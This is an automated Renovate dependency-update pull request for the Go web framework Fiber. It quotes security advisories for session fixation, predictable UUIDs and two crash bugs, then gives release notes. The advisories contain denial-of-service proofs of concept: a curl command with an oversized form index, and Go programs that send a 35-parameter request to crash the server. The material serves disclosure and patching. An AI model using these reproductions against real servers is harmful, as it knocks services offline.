fix(deps): update module github.com/gofiber/fiber/v2 to v2.52.12 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
github.com/gofiber/fiber/v2	v2.52.4 → v2.52.12

GitHub Vulnerability Alerts

CVE-2024-38513

A security vulnerability has been identified in the Fiber session middleware where a user can supply their own session_id value, leading to the creation of a session with that key.

Impact

The identified vulnerability is a session middleware issue in GoFiber versions 2 and above. This vulnerability allows users to supply their own session_id value, resulting in the creation of a session with that key. If a website relies on the mere presence of a session for security purposes, this can lead to significant security risks, including unauthorized access and session fixation attacks. All users utilizing GoFiber's session middleware in the affected versions are impacted.

Patches

The issue has been addressed in the latest patch. Users are strongly encouraged to upgrade to version 2.52.5 or higher to mitigate this vulnerability.

Workarounds

Users who are unable to upgrade immediately can apply the following workarounds to reduce the risk:

1. Validate Session IDs: Implement additional validation to ensure session IDs are not supplied by the user and are securely generated by the server.
2. Session Management: Regularly rotate session IDs and enforce strict session expiration policies.

References

For more information on session best practices:

• OWASP Session Management Cheat Sheet

Users are encouraged to review these references and take immediate action to secure their applications.

CVE-2025-54801

Description

When using Fiber's Ctx.BodyParser to parse form data containing a large numeric key that represents a slice index (e.g., test.18446744073704), the application crashes due to an out-of-bounds slice allocation in the underlying schema decoder.

The root cause is that the decoder attempts to allocate a slice of length idx + 1 without validating whether the index is within a safe or reasonable range. If idx is excessively large, this leads to an integer overflow or memory exhaustion, causing a panic or crash.

Steps to Reproduce

Create a POST request handler that accepts x-www-form-urlencoded data

package main

import (
	"fmt"
	"net/http"

	"github.com/gofiber/fiber/v2"
)

type RequestBody struct {
	NestedContent []*struct{} `form:"test"`
}

func main() {
	app := fiber.New()

	app.Post("/", func(c *fiber.Ctx) error {
		formData := RequestBody{}
		if err := c.BodyParser(&formData); err != nil {
			fmt.Println(err)
			return c.SendStatus(http.StatusUnprocessableEntity)
		}
		return nil
	})

	fmt.Println(app.Listen(":3000"))
}

Run the server and send a POST request with a large numeric key in form data, such as:

curl -v -X POST localhost:3000 --data-raw 'test.18446744073704' \
  -H 'Content-Type: application/x-www-form-urlencoded'

Relevant Code Snippet

Within the decoder's decode method:

idx := parts[0].index
if v.IsNil() || v.Len() < idx+1 {
    value := reflect.MakeSlice(t, idx+1, idx+1)  // <-- Panic/crash occurs here when idx is huge
    if v.Len() < idx+1 {
        reflect.Copy(value, v)
    }
    v.Set(value)
}

The idx is not validated before use, leading to unsafe slice allocation for extremely large values.

---

Impact

• Application panic or crash on malicious or malformed input.
• Potential denial of service (DoS) via memory exhaustion or server crash.
• Lack of defensive checks in the parsing code causes instability.

CVE-2025-66630

Fiber v2 contains an internal vendored copy of gofiber/utils, and its functions UUIDv4() and UUID() inherit the same critical weakness described in the upstream advisory. On Go versions prior to 1.24, the underlying crypto/rand implementation can return an error if secure randomness cannot be obtained. In such cases, these Fiber v2 UUID functions silently fall back to generating predictable values — the all-zero UUID 00000000-0000-0000-0000-000000000000.

On Go 1.24+, the language guarantees that crypto/rand no longer returns an error (it will block or panic instead), so this vulnerability primarily affects Fiber v2 users running Go 1.23 or earlier, which Fiber v2 officially supports.

Because no error is returned by the Fiber v2 UUID functions, application code may unknowingly rely on predictable, repeated, or low-entropy identifiers in security-critical pathways. This is especially impactful because many Fiber v2 middleware components (session middleware, CSRF, rate limiting, request-ID generation, etc.) default to using utils.UUIDv4().

Impact includes, but is not limited to:

• Session fixation or hijacking (predictable session IDs)
• CSRF token forgery or bypass
• Authentication replay / token prediction
• Potential denial-of-service (DoS): if the zero UUID is generated, key-based structures (sessions, rate-limits, caches, CSRF stores) may collapse into a single shared key, causing overwrites, lock contention, or state corruption
• Request-ID collisions, undermining logging and trace integrity
• General compromise of confidentiality, integrity, and authorization logic relying on UUIDs for uniqueness or secrecy

All Fiber v2 versions containing the internal utils.UUIDv4() / utils.UUID() implementation are affected when running on Go <1.24. No patched Fiber v2 release currently exists.

---

Suggested Mitigations / Workarounds

Update to the latest version of Fiber v2.

---

Likelihood / Environmental Factors

It’s important to note that entropy exhaustion on modern Linux systems is extremely rare, as the kernel’s CSPRNG is resilient and non-blocking. However, entropy-source failures — where crypto/rand cannot read from its underlying provider — are significantly more likely in certain environments.

This includes containerized deployments, restricted sandboxes, misconfigured systems lacking read access to /dev/urandom or platform-equivalent sources, chrooted or jailed environments, embedded devices, or systems with non-standard or degraded randomness providers. On Go <1.24, such failures cause crypto/rand to return an error, which the Fiber v2 UUID functions currently treat as a signal to silently generate predictable UUIDs, including the zero UUID. This silent fallback is the root cause of the vulnerability.

---

References

• Upstream advisory for gofiber/utils: GHSA-m98w-cqp3-qcqr

• Source repositories:

  • github.com/gofiber/fiber
  • github.com/gofiber/utils

---

Credits / Reporter

Reported by @​sixcolors (Fiber Maintainer / Security Team)

CVE-2026-25882

A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.

Affected Versions

• Fiber v3.0.0-rc.3 and earlier v3 releases
• Fiber v2.52.10 and potentially all v2 releases (confirmed exploitable)
• Both versions share the same vulnerable routing implementation

Vulnerability Details

Root Cause

Both Fiber v2 and v3 define a fixed-size parameter array in ctx.go:

const maxParams = 30

type DefaultCtx struct {
    values [maxParams]string  // Fixed 30-element array
    // ...
}

The router.go register() function accepts routes without validating parameter count. When a request matches a route exceeding 30 parameters, the code in path.go performs an unbounded write:

• v3: path.go:514
• v2: path.go:516

// path.go:514 - NO BOUNDS CHECKING
params[paramsIterator] = path[:i]

When paramsIterator >= 30, this triggers:

panic: runtime error: index out of range [30] with length 30

Attack Scenario

1. Application registers route with >30 parameters (e.g., via code or dynamic routing):

   app.Get("/api/:p1/:p2/:p3/.../p35", handler)

2. Attacker sends matching HTTP request:

   curl http://target/api/v1/v2/v3/.../v35

3. Server crashes during request processing with runtime panic

Proof of Concept

For Fiber v3

package main

import (
	"fmt"
	"net/http"
	"time"
	"github.com/gofiber/fiber/v3"
)

func main() {
	app := fiber.New()
	
	// Register route with 35 parameters (exceeds maxParams=30)
	path := "/test"
	for i := 1; i <= 35; i++ {
		path += fmt.Sprintf("/:p%d", i)
	}
	
	fmt.Printf("Registering route: %s...\n", path[:50]+"...")
	app.Get(path, func(c fiber.Ctx) error {
		return c.SendString("Never reached")
	})
	fmt.Println("✓ Registration succeeded (NO PANIC)")
	
	go func() {
		app.Listen(":9999")
	}()
	time.Sleep(200 * time.Millisecond)
	
	// Build exploit URL with 35 parameter values
	url := "http://localhost:9999/test"
	for i := 1; i <= 35; i++ {
		url += fmt.Sprintf("/v%d", i)
	}
	
	fmt.Println("\n🔴 Sending exploit request...")
	fmt.Println("Expected: panic at path.go:514 params[paramsIterator] = path[:i]\n")
	
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("✗ Request failed: %v\n", err)
		fmt.Println("💥 Server crashed!")
	} else {
		fmt.Printf("Response: %d\n", resp.StatusCode)
		resp.Body.Close()
	}
}

Output:

Registering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...
✓ Registration succeeded (NO PANIC)

🔴 Sending exploit request...
Expected: panic at path.go:514 params[paramsIterator] = path[:i]

panic: runtime error: index out of range [30] with length 30

goroutine 40 [running]:
github.com/gofiber/fiber/v3.(*routeParser).getMatch(...)
	/path/to/fiber/path.go:514
github.com/gofiber/fiber/v3.(*Route).match(...)
	/path/to/fiber/router.go:89
github.com/gofiber/fiber/v3.(*App).next(...)
	/path/to/fiber/router.go:142

For Fiber v2

package main

import (
	"fmt"
	"net/http"
	"time"
	"github.com/gofiber/fiber/v2"
)

func main() {
	app := fiber.New()
	
	// Register route with 35 parameters (exceeds maxParams=30)
	path := "/test"
	for i := 1; i <= 35; i++ {
		path += fmt.Sprintf("/:p%d", i)
	}
	
	fmt.Printf("Registering route: %s...\n", path[:50]+"...")
	app.Get(path, func(c *fiber.Ctx) error {
		return c.SendString("Never reached")
	})
	fmt.Println("✓ Registration succeeded (NO PANIC)")
	
	go func() {
		app.Listen(":9998")
	}()
	time.Sleep(200 * time.Millisecond)
	
	// Build exploit URL with 35 parameter values
	url := "http://localhost:9998/test"
	for i := 1; i <= 35; i++ {
		url += fmt.Sprintf("/v%d", i)
	}
	
	fmt.Println("\n🔴 Sending exploit request...")
	fmt.Println("Expected: panic at path.go:516 params[paramsIterator] = path[:i]\n")
	
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("✗ Request failed: %v\n", err)
		fmt.Println("💥 Server crashed!")
	} else {
		fmt.Printf("Response: %d\n", resp.StatusCode)
		resp.Body.Close()
	}
}

Output (v2):

Registering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...
✓ Registration succeeded (NO PANIC)

🔴 Sending exploit request...
Expected: panic at path.go:516 params[paramsIterator] = path[:i]

panic: runtime error: index out of range [30] with length 30

goroutine 40 [running]:
github.com/gofiber/fiber/v2.(*routeParser).getMatch(...)
	/path/to/fiber/v2@​v2.52.10/path.go:512
github.com/gofiber/fiber/v2.(*Route).match(...)
	/path/to/fiber/v2@​v2.52.10/router.go:84
github.com/gofiber/fiber/v2.(*App).next(...)
	/path/to/fiber/v2@​v2.52.10/router.go:127

Impact

Exploitation Requirements

• No authentication required
• Single HTTP request triggers crash
• Trivially scriptable for sustained DoS
• Works against any route with >30 parameters

Real-World Impact

• Public APIs: Remote DoS attacks on vulnerable endpoints
• Microservices: Cascade failures if vulnerable service is critical
• Auto-scaling: Repeated crashes prevent proper recovery
• Monitoring: Log flooding and alert fatigue

Likelihood

HIGH - Exploitation requires only:

• Knowledge of route structure (often public in APIs)
• Standard HTTP client (curl, browser, etc.)
• Single malformed request

Workarounds

Until patched, users should:

1. Audit Routes: Ensure all routes have ≤30 parameters

   # Search for potential issues
   grep -r "/:.*/:.*/:.*" . | grep -v node_modules

2. Disable Dynamic Routing: If programmatically registering routes, validate parameter count:

   paramCount := strings.Count(route, ":")
   if paramCount > 30 {
       log.Fatal("Route exceeds maxParams")
   }

3. Rate Limiting: Deploy aggressive rate limiting to mitigate DoS impact

4. Monitoring: Alert on panic patterns in application logs

Timeline

• 2024-12-24: Vulnerability discovered in v3 during PR #​3962 review
• 2024-12-25: Proof of concept confirmed exploitability in v3
• 2024-12-25: Vulnerability confirmed to also exist in v2 (same root cause)
• 2024-12-25: Security advisory created

References

• v3 Related PR: https://github.com/gofiber/fiber/pull/3962 (UpdateParam feature with defensive checks, doesn't fix root cause)
• Vulnerable Code Locations:
  • v3: path.go:514
  • v2: path.go:516

Credit

Discovered by: @​sixcolors (Fiber maintainer) and @​TheAspectDev

---

Release Notes

gofiber/fiber (github.com/gofiber/fiber/v2)

v2.52.12

Compare Source

🐛 Fixes

• CVE fix GHSA-mrq8-rjmw-wpq3

Full Changelog: gofiber/fiber@v2.52.11...v2.52.12

v2.52.11

Compare Source

What's Changed

🧹 Updates

• Improve mount functionality by @​gaby in #​3900

🐛 Bug Fixes

• Backport defensive copying fixes from #​3828 and #​3829 to v2 by @​sixcolors in #​3888
• Fixes and improvements for limiter middleware by @​gaby in #​3899

Full Changelog: gofiber/fiber@v2.52.10...v2.52.11

v2.52.10

Compare Source

🐛 Bug Fixes

• Handle invalid path in filesystem by @​rokostik in #​3688
• Fix recover middleware panic output formatting by @​ReneWerner87 in #​3818
• Fix enforcement of Immutable config for some edge cases by @​gaby in #​3835

📚 Documentation

• Document RoutePatternMatch by @​ReneWerner87 in #​3723

New Contributors

• @​rokostik made their first contribution in #​3688

Full Changelog: gofiber/fiber@v2.52.9...v2.52.10

v2.52.9

Compare Source

🐛 Bug Fixes

• Add upper index limit for parsers by @​gaby in #​3503
• Embedded struct parsing by @​ReneWerner87 in #​3478
• Fix Content-Type comparison in Is() by @​gaby in #​3537
• Fix MIME type equality checks by @​gaby in #​3603

Full Changelog: gofiber/fiber@v2.52.8...v2.52.9

v2.52.8

Compare Source

👮 Security

• Fix for BodyParser - GHSA-hg3g-gphw-5hhm

🧹 Updates

• Backport ctx.String() from v3 by @​gaby in #​3294

🐛 Bug Fixes

• Fix routing with mount and static by @​ReneWerner87 in #​3454

📚 Documentation

• Update usage of ctx.Redirect() by @​andradei in #​3417
• Add AGENTS.md by @​gaby in #​3461

Full Changelog: gofiber/fiber@v2.52.6...v2.52.8

v2.52.7

Compare Source

v2.52.6

Compare Source

🐛 Bug Fixes

• Use Content-Length for bytesReceived and bytesSent tags in Logger Middleware in v2 by @​gaby in #​3067
• Fix handle un-matched open brackets in the query params by @​dojutsu-user in #​3121
• Middleware/CORS: Remove Scheme Restriction by @​zingi in #​3168
• Respect Immutable config for Body() by @​nickajacks1 in #​3246
• Support Square Bracket Notation in Multipart Form data by @​ReneWerner87 in #​3268

📚 Documentation

• Add detailed documentation for the templates guide by @​grivera64 in #​3113

🛠️ Maintenance

• Update benchmark-action to v1.20.3 by @​gaby in #​3084
• Add CODEOWNERS file by @​gaby in #​3124
• Update dependencies by @​gaby in #​3254
• Add parallel benchmark for Next() by @​gaby in #​3259

Full Changelog: gofiber/fiber@v2.52.5...v2.52.6

v2.52.5

Compare Source

👮 Security

Middleware/session: Session Middleware Token Injection Vulnerability - GHSA-98j2-3j3p-fw2v

https://docs.gofiber.io/api/middleware/session

🧹 Updates

• Middleware/session: Remove extra release and aquire ctx calls in session_test.go (#​3043)

🐛 Bug Fixes

• Middleware/monitor: middleware reporting of CPU usage (#​2984)
• Middleware/session: mutex for thread safety (#​3050)

📚 Documentation

• Improve ctx.Locals method description and example (#​3030)
• Improve ctx.Locals method documentation (#​3033)
• Update README_id.md (#​3045)

Full Changelog: gofiber/fiber@v2.52.4...v2.52.5

Thank you @​nyufeng, @​PaulTitto and @​sixcolors for making this update possible.

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 5 additional dependencies were updated

Details:

Package	Change
github.com/andybalholm/brotli	v1.0.5 -> v1.1.0
github.com/google/uuid	v1.5.0 -> v1.6.0
github.com/klauspost/compress	v1.17.0 -> v1.17.9
github.com/mattn/go-runewidth	v0.0.15 -> v0.0.16
golang.org/x/sys	v0.15.0 -> v0.28.0

[socket-security]

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff	Package	Supply Chain Security	Vulnerability	Quality	Maintenance	License
	github.com/​gofiber/​fiber/​v2@​v2.52.4 ⏵ v2.52.12	+1	+75

View full report

[renovate]

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 5 additional dependencies were updated

Details:

Package	Change
github.com/andybalholm/brotli	v1.0.5 -> v1.1.0
github.com/google/uuid	v1.5.0 -> v1.6.0
github.com/klauspost/compress	v1.17.0 -> v1.17.9
github.com/mattn/go-runewidth	v0.0.15 -> v0.0.16
golang.org/x/sys	v0.15.0 -> v0.28.0